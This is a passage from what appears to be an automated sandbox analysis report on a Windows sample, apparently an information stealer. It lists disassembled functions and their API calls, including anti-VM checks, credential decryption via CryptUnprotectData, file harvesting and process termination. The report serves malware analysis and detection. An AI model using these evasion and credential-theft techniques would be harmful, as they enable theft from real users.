                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004EA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005AC000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005B9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000643000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000647000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: %hu/%hu/$%hu/%hu/%hu$CreateDC$CreateDCA$CryptStringToBinaryA$DISPLAY$DISPLAY$GetDevic$GetDeviceCaps$GetUserN$GetUserNameA$HAL9TH$JohnDoe$JohnDoe$NtQueryInformationProcess$ReleaseD$ReleaseDC$VMwareVM$VMwareVMware$crypt32.$crypt32.dll$gdi32.dl$gdi32.dll$ntdll.dl$ntdll.dll$sscanf$user32.d$user32.dll
                                                                                                                                                                                                                                                  • API String ID: 0-2179091496
                                                                                                                                                                                                                                                  • Opcode ID: 3d03c016c40e7bf2fefc509958d87a2e635967e32702d11625f5e8fc5cb7fd27
                                                                                                                                                                                                                                                  • Instruction ID: 86e27b9bdcb8569573e06bdff851749a70f31a48c5ecb8a307c45d2392953fab
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3d03c016c40e7bf2fefc509958d87a2e635967e32702d11625f5e8fc5cb7fd27
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2A712861818BC58ED712CF24AD187563FE3AB5B348F08725EC8541E2B6D7FA0089C7D9
                                                                                                                                                                                                                                                  Function 00B1AE0D Relevance: 22.6, APIs: 15, Instructions: 139stringfileCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3469557335.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_b00000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _mbscpy$FileFindstrcmpstrlenwsprintf$CloseFirstFolderOperationPath_splitpathisupper
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 260673504-0
                                                                                                                                                                                                                                                  • Opcode ID: 9de74252184d4e92245189a4cf74812e0976ee0e09d85f25a583efaa8448754d
                                                                                                                                                                                                                                                  • Instruction ID: e6559cc529cbd600791dbdf47bba5bd5603648341284051c2263ff6a8a94ea91
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9de74252184d4e92245189a4cf74812e0976ee0e09d85f25a583efaa8448754d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 845160B18083849ED7209734AC46BDB3BF9DFA5304F4519ECF84892151EB75E689C367
                                                                                                                                                                                                                                                  Function 0040D820 Relevance: 16.2, APIs: 5, Strings: 4, Instructions: 442fileCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 0041370E: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,004073A7,0042EEFC), ref: 00413732
                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,?,?,\*.*,0042EEFC), ref: 0040D891
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrlenA.KERNEL32(?,?,?,?,?,00407506,?,------,?,?,?,?,00000014), ref: 00413879
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,00407506,?,------,?,?,?,?,00000014), ref: 004138A2
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrcatA.KERNEL32(00000000,?,?,00407506,?,------,?,?,?,?,00000014), ref: 004138AA
                                                                                                                                                                                                                                                    • Part of subcall function 004137C0: lstrcpyA.KERNEL32(00000000,?,?,?,?,004074B1,?,?,?,?,00000014), ref: 004137F8
                                                                                                                                                                                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040DC89
                                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000,00000000), ref: 0040DD67
                                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(?), ref: 0040DDA0
                                                                                                                                                                                                                                                  • FindClose.KERNEL32(?), ref: 0040DDB1
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3437971696.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000436000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000447000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000045A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000484000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000489000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000048D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004BA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004C2000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004DB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004E4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004EA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005AC000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005B9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000643000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000647000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: File$Findlstrcpy$CloseCopyDeleteFirstNextlstrcatlstrlen
                                                                                                                                                                                                                                                  • String ID: \*.*$q:d$q:d$q:d
                                                                                                                                                                                                                                                  • API String ID: 124472186-1383382868
                                                                                                                                                                                                                                                  • Opcode ID: cb5de748d47e18521a663841614ad92215ed0099e6ebd374e2969049b16209e8
                                                                                                                                                                                                                                                  • Instruction ID: fd5909e8a48491a8fe3474c087fdb49959fee0d6d26b23eadbfe979ac181219e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cb5de748d47e18521a663841614ad92215ed0099e6ebd374e2969049b16209e8
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 20F165B8A002185ACB06FF62C8D59FE7B769F45749F00442EF412572D2DF289F89CB99
                                                                                                                                                                                                                                                  Function 00B1986A Relevance: 13.8, APIs: 9, Instructions: 316stringfileCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(?,?), ref: 00B198BC
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0042EEFC), ref: 00B199A2
                                                                                                                                                                                                                                                  • PathMatchSpecA.SHLWAPI(?,?), ref: 00B19A22
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 00B19A48
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 00B19A81
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00644BCD), ref: 00B19A89
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 00B19A97
                                                                                                                                                                                                                                                    • Part of subcall function 00B139A7: lstrcpy.KERNEL32(00000000), ref: 00B139CA
                                                                                                                                                                                                                                                    • Part of subcall function 00B17BE4: Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B17C8E
                                                                                                                                                                                                                                                    • Part of subcall function 00B17BE4: CreateThread.KERNEL32(00000000,00000000,0041A90D,?,00000000,00000000), ref: 00B17CE0
                                                                                                                                                                                                                                                    • Part of subcall function 00B17BE4: WaitForSingleObject.KERNEL32(00000000,000003E8,?,?,?,?,?,?,?,?,?,?,?,?,00B01A24,?), ref: 00B17CEC
                                                                                                                                                                                                                                                    • Part of subcall function 00B1986A: FindNextFileA.KERNEL32(00000000,?), ref: 00B19CB6
                                                                                                                                                                                                                                                    • Part of subcall function 00B1986A: FindClose.KERNEL32(00000000), ref: 00B19CC5
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3469557335.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_b00000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: lstrcat$Find$File$CloseCreateFirstMatchNextObjectPathSingleSleepSpecThreadWaitlstrcpy
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3744366743-0
                                                                                                                                                                                                                                                  • Opcode ID: 00f26f1d4340412f04d36141e4c609a0aa82bd52beccc6cf5ccb4e54d5e617c6
                                                                                                                                                                                                                                                  • Instruction ID: 7e841eeca9d58092f30c26a2179889f74c154c9a5898143ea54ed5e362e647c5
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 00f26f1d4340412f04d36141e4c609a0aa82bd52beccc6cf5ccb4e54d5e617c6
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E7D1BD359006999BCF01DFA0DC82BEDBBFAFF4A344F405189E90567152EF70AA85CB91
                                                                                                                                                                                                                                                  Function 00B1550C Relevance: 13.6, APIs: 9, Instructions: 57processCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00B15524
                                                                                                                                                                                                                                                  • Process32First.KERNEL32(00000000,?), ref: 00B1552E
                                                                                                                                                                                                                                                  • Process32Next.KERNEL32(00000000,?), ref: 00B1553A
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,?), ref: 00B15554
                                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00B15568
                                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 00B15577
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00B1557E
                                                                                                                                                                                                                                                  • Process32Next.KERNEL32(00000000,?), ref: 00B1558B
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00B15596
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3469557335.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_b00000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3836391474-0
                                                                                                                                                                                                                                                  • Opcode ID: 744bf93798593bbbf3aff87105b76b44fa1c2028e89e1f0adc62def67fc8c5fa
                                                                                                                                                                                                                                                  • Instruction ID: d1b7c00692ff4bcf529f04c5235f8a916771bfeadc389fa699066e187fffe1e4
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 744bf93798593bbbf3aff87105b76b44fa1c2028e89e1f0adc62def67fc8c5fa
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 42118439200705AFD3202B61AC4EFAB7BFEFFC6B55F051028FA0596151EF749951CA61
                                                                                                                                                                                                                                                  Function 00B192FC Relevance: 12.3, APIs: 8, Instructions: 272stringfilememoryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 00B1930E
                                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(?,?), ref: 00B195A7
                                                                                                                                                                                                                                                  • FindClose.KERNEL32(?), ref: 00B195B8
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 00B195D0
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?), ref: 00B195DD
                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(?), ref: 00B195E9
                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(?), ref: 00B19603
                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(?,?), ref: 00B1936A
                                                                                                                                                                                                                                                    • Part of subcall function 00B139A7: lstrcpy.KERNEL32(00000000), ref: 00B139CA
                                                                                                                                                                                                                                                    • Part of subcall function 00B18F80: memset.MSVCRT ref: 00B18F9C
                                                                                                                                                                                                                                                    • Part of subcall function 00B18F80: memset.MSVCRT ref: 00B18FAD
                                                                                                                                                                                                                                                    • Part of subcall function 00B18F80: lstrcat.KERNEL32(?), ref: 00B18FEB
                                                                                                                                                                                                                                                    • Part of subcall function 00B18F80: lstrcat.KERNEL32(?,?), ref: 00B18FF9
                                                                                                                                                                                                                                                    • Part of subcall function 00B18F80: lstrcat.KERNEL32(?), ref: 00B19006
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3469557335.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_b00000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: lstrcat$Find$Filelstrlenmemset$CloseFirstHeapNextProcesslstrcpy
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 365803619-0
                                                                                                                                                                                                                                                  • Opcode ID: 086b2853c8734edb0c8109cc3b413a3d6e782f6078e460423ab1a0194b1db5fd
                                                                                                                                                                                                                                                  • Instruction ID: 5f4061090e222da49ace4dbc3450834e4834238bf707afd726e3dfbd04c0e4c1
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 086b2853c8734edb0c8109cc3b413a3d6e782f6078e460423ab1a0194b1db5fd
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 12B1C3359002589BCF01EFA4DC82BEE77F5FF59704F406199E90667152EF70AA85CB50
                                                                                                                                                                                                                                                  Function 00B18952 Relevance: 12.2, APIs: 8, Instructions: 190stringfileCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(?,?), ref: 00B189A7
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 00B18A6B
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?), ref: 00B18A78
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 00B18A86
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 00B18A93
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 00B18ACD
                                                                                                                                                                                                                                                    • Part of subcall function 00B13975: lstrcpy.KERNEL32(00000000,?), ref: 00B13999
                                                                                                                                                                                                                                                    • Part of subcall function 00B139A7: lstrcpy.KERNEL32(00000000), ref: 00B139CA
                                                                                                                                                                                                                                                    • Part of subcall function 00B17BE4: Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B17C8E
                                                                                                                                                                                                                                                    • Part of subcall function 00B17BE4: CreateThread.KERNEL32(00000000,00000000,0041A90D,?,00000000,00000000), ref: 00B17CE0
                                                                                                                                                                                                                                                    • Part of subcall function 00B17BE4: WaitForSingleObject.KERNEL32(00000000,000003E8,?,?,?,?,?,?,?,?,?,?,?,?,00B01A24,?), ref: 00B17CEC
                                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(00000000,?), ref: 00B18BB6
                                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00B18BC5
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3469557335.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_b00000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: lstrcat$Find$Filelstrcpy$CloseCreateFirstNextObjectSingleSleepThreadWait
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 888904454-0
                                                                                                                                                                                                                                                  • Opcode ID: 1289c8857d586a46948a72ea4e672cf2eaa2f5b027f9c57f8ed3330df6fd0136
                                                                                                                                                                                                                                                  • Instruction ID: 7b6888afdd8e6d6877493b0ac14dec27b649c868f6e0088cc26bf544fb8496aa
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1289c8857d586a46948a72ea4e672cf2eaa2f5b027f9c57f8ed3330df6fd0136
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C381C0758006589FCB11DFA0DC82AEEB7F9FF09300F405199E906A7151EF74AA89CF90
                                                                                                                                                                                                                                                  Function 00B1C201 Relevance: 7.7, APIs: 5, Instructions: 186COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00B1C21F
                                                                                                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00B1C245
                                                                                                                                                                                                                                                    • Part of subcall function 00B13975: lstrcpy.KERNEL32(00000000,?), ref: 00B13999
                                                                                                                                                                                                                                                  • ShellExecuteEx.SHELL32(?), ref: 00B1C44A
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00B1C46D
                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00B1C47D
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3469557335.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_b00000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: memset$ExecuteExitFileModuleNameProcessShelllstrcpy
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3423973079-0
                                                                                                                                                                                                                                                  • Opcode ID: 24f43bb3527911016e82c6304e7adf950fb8ea5c774f849889b6f01b72f090a7
                                                                                                                                                                                                                                                  • Instruction ID: 6c359c43590901b29b82e217626ece4261c7377287c498c7335ca77897211a50
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 24f43bb3527911016e82c6304e7adf950fb8ea5c774f849889b6f01b72f090a7
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A0616420F047804BD7159F2498C27BE7FE6AFDA704F44666DF4CA87282DB785AC58382
                                                                                                                                                                                                                                                  Function 00B1413E Relevance: 7.6, APIs: 5, Instructions: 86memoryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00B13975: lstrcpy.KERNEL32(00000000,?), ref: 00B13999
                                                                                                                                                                                                                                                  • GetKeyboardLayoutList.USER32(00000000,00000000,0042EEFC), ref: 00B1415D
                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 00B1416F
                                                                                                                                                                                                                                                  • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00B14179
                                                                                                                                                                                                                                                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00B141A2
                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(?,?,00000000,00000200,?,?,?), ref: 00B14245
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3469557335.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_b00000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3090951853-0
                                                                                                                                                                                                                                                  • Opcode ID: 544f6d7a26ade535f44ad9235432a807762fd0ca6bd9a68562a0e95ac78c3c38
                                                                                                                                                                                                                                                  • Instruction ID: 6329f372b53cddbd5443650c8f741ef02646c9aefefbb592935ef61ed82dfaca
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 544f6d7a26ade535f44ad9235432a807762fd0ca6bd9a68562a0e95ac78c3c38
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6B21B435204344AFD320AB509C8AFEF7BE9EF85B44F44085CBA9A47192DF785D98C751
                                                                                                                                                                                                                                                  Function 00B14DD7 Relevance: 7.6, APIs: 5, Instructions: 66memoryencryptionCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,00B07653,?,?,?,?,?), ref: 00B14E0D
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,00B07653,?,?,?,?,?), ref: 00B14E20
                                                                                                                                                                                                                                                  • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,00B07653,?,?,?,?,?), ref: 00B14E41
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00B07653,?,?,?,?,?), ref: 00B14E5B
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,00B07653,?,?,?,?,?), ref: 00B14E69
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3469557335.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_b00000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: BinaryCryptHeapProcessString$ErrorLast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1339486156-0
                                                                                                                                                                                                                                                  • Opcode ID: 7589891c4f873d9eacc06b29ea4d395704f2ffe9cccf2032afe3450d41c03d5a
                                                                                                                                                                                                                                                  • Instruction ID: 0c2dccea843d142c748db49906107d916c03e73165803971fe39dbadd1234e6c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7589891c4f873d9eacc06b29ea4d395704f2ffe9cccf2032afe3450d41c03d5a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E4116D76204205AFE7209FA5EC84F57BBE9FF9A795F96042CF99093220CB71DC448B60
                                                                                                                                                                                                                                                  Function 00B15468 Relevance: 7.5, APIs: 5, Instructions: 39processCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00B1547E
                                                                                                                                                                                                                                                  • Process32First.KERNEL32(00000000), ref: 00B15488
                                                                                                                                                                                                                                                  • Process32Next.KERNEL32(00000000), ref: 00B1549F
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,?), ref: 00B154AB
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00B154BC
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3469557335.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_b00000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 420147892-0
                                                                                                                                                                                                                                                  • Opcode ID: 5012a1a39373a8439626fa26436eeae440fc5d79da291cd707dce7a7579f2252
                                                                                                                                                                                                                                                  • Instruction ID: 3a8b061322d1e48deb70b74805a8fbb25f483d0b41d3ae4475e26046f15a8a26
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5012a1a39373a8439626fa26436eeae440fc5d79da291cd707dce7a7579f2252
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E5F09031201605ABE3305B21ED4EFAB7BECDFC6756F400424F945D6240EA389995C761
                                                                                                                                                                                                                                                  Function 00B140BB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40memorytimeCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,00644A23,?,?,?,?,?,?,00644A98,?,?,00644A23,?,?,?), ref: 00B140C9
                                                                                                                                                                                                                                                  • GetTimeZoneInformation.KERNEL32 ref: 00B140DE
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3469557335.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_b00000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: HeapInformationProcessTimeZone
                                                                                                                                                                                                                                                  • String ID: wwww
                                                                                                                                                                                                                                                  • API String ID: 3869334356-671953474
                                                                                                                                                                                                                                                  • Opcode ID: ab4f5e0465bb3e6a8121483e4f84586011c19975fa269fce5d75153393847ed2
                                                                                                                                                                                                                                                  • Instruction ID: 01de0ab9bedbf66581af6dfb3a31ab8a8ad8385509c8934712a104f8d9598312
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ab4f5e0465bb3e6a8121483e4f84586011c19975fa269fce5d75153393847ed2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 76F0FF38B002506BD710973CBC0BB863A67ABDB721F096264E280DB3E4DE704C6483CA
                                                                                                                                                                                                                                                  Function 00B0B26D Relevance: 4.5, APIs: 3, Instructions: 42memoryencryptionCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CryptUnprotectData.CRYPT32 ref: 00B0B2A2
                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 00B0B2BE
                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(?), ref: 00B0B2DA
